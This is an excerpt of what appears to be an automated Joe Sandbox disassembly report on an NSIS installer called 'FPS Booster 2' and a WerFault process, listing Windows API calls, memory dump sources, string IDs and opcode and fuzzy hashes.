                                                • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                APIs
                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                • String ID: <RM>$Show$WriteINIStr: wrote [%s] %s=%s in %s
                                                • API String ID: 247603264-2407876207
                                                • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00405083
                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                • API String ID: 2266616436-4211696005
                                                • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                APIs
                                                  • Part of subcall function 6FFB13F8: GetPropW.USER32(?,NSIS: nsControl pointer property), ref: 6FFB1401
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 6FFB14CE
                                                • SetCursor.USER32(00000000,?,?,?), ref: 6FFB14D5
                                                • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 6FFB14F2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Cursor$CallLoadProcPropWindow
                                                • String ID:
                                                • API String ID: 1635134901-3916222277
                                                • Opcode ID: 187e4e5c36e648225258dcf07840df28b0a39d944ebebbea49e47999a3dc73d5
                                                • Instruction ID: cad228a4e6c2b0a413108ccb12fc1613e027c47bb053b8497ab41957c55be87e
                                                • Opcode Fuzzy Hash: 187e4e5c36e648225258dcf07840df28b0a39d944ebebbea49e47999a3dc73d5
                                                • Instruction Fuzzy Hash: D1E0ED3219460AFBDF015FA1CD4AB993B69FF0A396F048534FA29991A0CB719120DB61
                                                APIs
                                                  • Part of subcall function 6E9E15A3: lstrcpyW.KERNEL32(00000000,?,?,?,6E9E185F,?,6E9E1017), ref: 6E9E15C1
                                                  • Part of subcall function 6E9E15A3: GlobalFree.KERNEL32 ref: 6E9E15D2
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6E9E118F
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E11D0
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E11F0
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E1204
                                                • GlobalFree.KERNEL32(?), ref: 6E9E122E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloclstrcpy
                                                • String ID:
                                                • API String ID: 852173138-0
                                                • Opcode ID: 4efe0d6e25cc2eefa902258e8f0ba69990fc850d6ca58e6d2730f2753fe8799c
                                                • Instruction ID: 21ab988a3f6daa7e80b306cef85696fad5eed2e4b1167759c88843533ba9d55c
                                                • Opcode Fuzzy Hash: 4efe0d6e25cc2eefa902258e8f0ba69990fc850d6ca58e6d2730f2753fe8799c
                                                • Instruction Fuzzy Hash: 5131C5B2808201DFD7528FEADC44AB97BECFF4B251B000925EB54D7A50E734DD498E20
                                                APIs
                                                  • Part of subcall function 6E9E15A3: lstrcpyW.KERNEL32(00000000,?,?,?,6E9E185F,?,6E9E1017), ref: 6E9E15C1
                                                  • Part of subcall function 6E9E15A3: GlobalFree.KERNEL32 ref: 6E9E15D2
                                                • GlobalFree.KERNEL32(?), ref: 6E9E1A04
                                                • GlobalFree.KERNEL32(?), ref: 6E9E1A9C
                                                • GlobalFree.KERNEL32(?), ref: 6E9E1AA1
                                                • __alldvrm.LIBCMT ref: 6E9E1ACB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FreeGlobal$__alldvrmlstrcpy
                                                • String ID:
                                                • API String ID: 1811517867-0
                                                • Opcode ID: 147d0771ab3fdc434a3156f2ad4bebd73f8d87d118602f14fee540c7a5296cad
                                                • Instruction ID: 4b97b624ea94fdaf9d78096e9ebd2a4f82fa34cfd39c68ec976e1728f6099a37
                                                • Opcode Fuzzy Hash: 147d0771ab3fdc434a3156f2ad4bebd73f8d87d118602f14fee540c7a5296cad
                                                • Instruction Fuzzy Hash: BF51EE31D04109FB9B93DFEB84809BDB7B9AF873147148956D728B3914E670DF488E51
                                                APIs
                                                  • Part of subcall function 6E9E1C1B: GlobalFree.KERNEL32(?), ref: 6E9E1E69
                                                  • Part of subcall function 6E9E1C1B: GlobalFree.KERNEL32(?), ref: 6E9E1E6E
                                                  • Part of subcall function 6E9E1C1B: GlobalFree.KERNELBASE(?), ref: 6E9E1E73
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E2868
                                                  • Part of subcall function 6E9E15E0: GlobalAlloc.KERNEL32(00000040,?,?,6E9E18AA,?), ref: 6E9E15F6
                                                  • Part of subcall function 6E9E15E0: lstrcpynW.KERNEL32(00000004,?,?,6E9E18AA,?), ref: 6E9E160C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloclstrcpyn
                                                • String ID: error
                                                • API String ID: 4250884139-1574812785
                                                • Opcode ID: f79aff1de5328bdc23e64f3da941d11c13acf6d5044f17c9902fa1c98d3b9eae
                                                • Instruction ID: ee18867478b7bac41f8c4bed0efadf7281876d73b21242b2f71cfd23add0203c
                                                • Opcode Fuzzy Hash: f79aff1de5328bdc23e64f3da941d11c13acf6d5044f17c9902fa1c98d3b9eae
                                                • Instruction Fuzzy Hash: 5501A1B250C601AAC753DBF5D444BDE7BECAF933A9F00082AE34493950DB70D8498EA2
                                                APIs
                                                • lstrlenW.KERNEL32(?,00000000,00000400,?,00000400,?,76F8F380), ref: 6FFB129A
                                                • CharPrevW.USER32(?,00000000,?,76F8F380), ref: 6FFB12A5
                                                • MulDiv.KERNEL32(00000000,00000000,00000064), ref: 6FFB12C6
                                                • MapDialogRect.USER32(?,?), ref: 6FFB12EB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: CharDialogPrevRectlstrlen
                                                • String ID:
                                                • API String ID: 3411278111-0
                                                • Opcode ID: c475eb5781d0a8c1401a6fd2ebbf3464fa405a1acd68ef0199485d2077dba616
                                                • Instruction ID: 45ef87d6d8144362c8df644075ba2f1707e40c48bb95937de7dcfbffa143e04d
                                                • Opcode Fuzzy Hash: c475eb5781d0a8c1401a6fd2ebbf3464fa405a1acd68ef0199485d2077dba616
                                                • Instruction Fuzzy Hash: 4F01DB72D00624DBCB119F5ACC84BAEBBFCEF46365B01011AF801E7254E3709910CBD0
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 6FFB146D
                                                • DestroyWindow.USER32 ref: 6FFB1484
                                                • GetProcessHeap.KERNEL32(00000000), ref: 6FFB1491
                                                • HeapFree.KERNEL32(00000000), ref: 6FFB1498
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: HeapWindow$CallDestroyFreeProcProcess
                                                • String ID:
                                                • API String ID: 1278960361-0
                                                • Opcode ID: 47a3e2fa0bbfc87515ecc1ad7bd6c4f36c6c0f1d3048f20dc24b9263faf27948
                                                • Instruction ID: d170c3b6b6fab5c89bdffd25008d8862d5c747fa85e7926be9239366ca64fcb3
                                                • Opcode Fuzzy Hash: 47a3e2fa0bbfc87515ecc1ad7bd6c4f36c6c0f1d3048f20dc24b9263faf27948
                                                • Instruction Fuzzy Hash: 94015A32564A08EFCF129F56DD88B893B79FF4A3B2B11812AFA1986270C7309425DF50
                                                APIs
                                                  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                • String ID: Version
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                • GetTickCount.KERNEL32 ref: 00403303
                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                Similarity
                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                • String ID:
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 0040492E
                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                Strings
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                APIs
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426D70,76F923A0,00000000), ref: 00404FD6
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FE6
                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FF9
                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                Strings
                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                Similarity
                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                APIs
                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                Strings
                                                Similarity
                                                • API ID: PrivateProfileStringlstrcmp
                                                • String ID: !N~
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                Strings
                                                • Error launching installer, xrefs: 00405C74
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                APIs
                                                • lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                Strings
                                                • File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1), xrefs: 004062D1, 004062D6
                                                Similarity
                                                • API ID: CloseHandlelstrlenwvsprintf
                                                • String ID: File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1)
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0DL
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: 6B$6B$6B$6B$6B$6B$6B$#S}$0DL$0DL
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: $r6B$r6B$r6B$r6B
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: "$"$-$[${
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /B$/B$/B$/B
                                                • API String ID: 0-2403987392
                                                • Opcode ID: 334419b4606218fb2629c4313bd6356eedc188156e205eded8a3c241747a931d
                                                • Instruction ID: 9180fdbe53a188556fa034f96ba7fdefc4eb332634e41411ca7045e617611865
                                                • Opcode Fuzzy Hash: 334419b4606218fb2629c4313bd6356eedc188156e205eded8a3c241747a931d
                                                • Instruction Fuzzy Hash: C902F4309189598EEB95EB68C899BECB7B2FF58340F5041EAD01DD3292DE3969C1CF41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8eL$N_I$N_I
                                                • API String ID: 0-4106880614
                                                • Opcode ID: f226a5625b9edb5a0f42bbcd3acd3d83c2dfddcafaf4b434f4040787a76349a4
                                                • Instruction ID: c5fe8b62dac5ab55b248289f9b39d6ebc0228be3166702163d7f02f299b102a9
                                                • Opcode Fuzzy Hash: f226a5625b9edb5a0f42bbcd3acd3d83c2dfddcafaf4b434f4040787a76349a4
                                                • Instruction Fuzzy Hash: 72D11572E8C9869FE7448B68E8416BDBBF2FF55750F0441BAD008C71CBDE28A985C781
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6B$L$L
                                                • API String ID: 0-3737499674
                                                • Opcode ID: 31fdd66b103848a97b2de8cde098a3c2511de76eb847b7fc690c8ad6398bfa2d
                                                • Instruction ID: 908a91cec2d18cc5d95e545812a95d9c33d705fb7c4e78e2efa7278053630f00
                                                • Opcode Fuzzy Hash: 31fdd66b103848a97b2de8cde098a3c2511de76eb847b7fc690c8ad6398bfa2d
                                                • Instruction Fuzzy Hash: FFA19170A08A5D8FDF98EF58C894BA9B7F1FF69301F1045A9D00DE7296CA35A985CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (3K$^N_H$r6B
                                                • API String ID: 0-95864145
                                                • Opcode ID: 33917350ec99588e6c040d7945e099cf1c4922d466afb55a83e410766eedb50e
                                                • Instruction ID: 52d95e83490f72f85c4de52613782813f11a54a619e5a6c93beba6cd517afaae
                                                • Opcode Fuzzy Hash: 33917350ec99588e6c040d7945e099cf1c4922d466afb55a83e410766eedb50e
                                                • Instruction Fuzzy Hash: EA319730E5895E8FDF84EBA8D499AAD7BF1FF58341F540165D00DE72A6DB38A881CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8eL$N_I$N_I
                                                • API String ID: 0-4106880614
                                                • Opcode ID: 9b327634b3a5c9b9df33ddb26911ec8584d6efcca3358c6d10e96d9fa50011dd
                                                • Instruction ID: 6e7ab5de08090d80917d80c7e7aac02eef25f4f4bb4dea6f21fd88126392ef08
                                                • Opcode Fuzzy Hash: 9b327634b3a5c9b9df33ddb26911ec8584d6efcca3358c6d10e96d9fa50011dd
                                                • Instruction Fuzzy Hash:
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B$r6B
                                                • API String ID: 0-2860294223
                                                • Opcode ID: 28347800a753de3ced5cdd5f8b63b6f78420a6b636f48e1aeac6645e1fc9af71
                                                • Instruction ID: 900ae8e7d30f86c2d6efce07301f850926a0c2296e633364826cc50ffdd54e67
                                                • Opcode Fuzzy Hash: 28347800a753de3ced5cdd5f8b63b6f78420a6b636f48e1aeac6645e1fc9af71
                                                • Instruction Fuzzy Hash: A2E16D30D4865A8FDB59CB58C495ABCB7F2FF58344F2045BED06ED7286CA386982CB01
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B$r6B
                                                • API String ID: 0-2860294223
                                                • Opcode ID: ba372eee3ca6d65194f9c2179dde1b79f8c35884bb9df064ea542cbfc3769746
                                                • Instruction ID: 1be871bd9456f0ddd70bf07ef8591783350228c57d875c09c1271d3e3a5a2372
                                                • Opcode Fuzzy Hash: ba372eee3ca6d65194f9c2179dde1b79f8c35884bb9df064ea542cbfc3769746
                                                • Instruction Fuzzy Hash: 8991E43094CB8A8FE755DB2894946A9B7F2FF55340F5445BEC09AC7693DA39F842CB00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O_H$HBL
                                                • API String ID: 0-3339347136
                                                • Opcode ID: 7924c530bde0ecc6deecc4a8a85c3340478a2b31c8d728ed670bd185c92b535e
                                                • Instruction ID: 508c7af14150ddd3c1b596bb6c2e7c407eadbe4123089a28ae0d32bc470025dd
                                                • Opcode Fuzzy Hash: 7924c530bde0ecc6deecc4a8a85c3340478a2b31c8d728ed670bd185c92b535e
                                                • Instruction Fuzzy Hash: 6141BB71C18A8E9FEB45EBA8D8156FDBBF5FF05341F0801BAD009E7282DE286944CB41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ^N_H$r6B
                                                • API String ID: 0-2163777836
                                                • Opcode ID: 86e78efd322249dee60d89f879cce2fbf2ba80d17d6d376860c9843010d5425d
                                                • Instruction ID: 60839c7374113f0f772e0768e9aefe90deb277475e68739c0526d06b15d82f07
                                                • Opcode Fuzzy Hash: 86e78efd322249dee60d89f879cce2fbf2ba80d17d6d376860c9843010d5425d
                                                • Instruction Fuzzy Hash: 8E319770A5891D9FDF84EB98D499EAE77F1FF58341F000069D00DD7292DA38A881CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1429077766.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ff887b30000_WerFault.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O_H$HBL
                                                • API String ID: 0-3339347136
                                                • Opcode ID: 11bce277aeadbc8d94aa30e086433060878ffe0e93bf7cb5d4f1a6365a84ee62
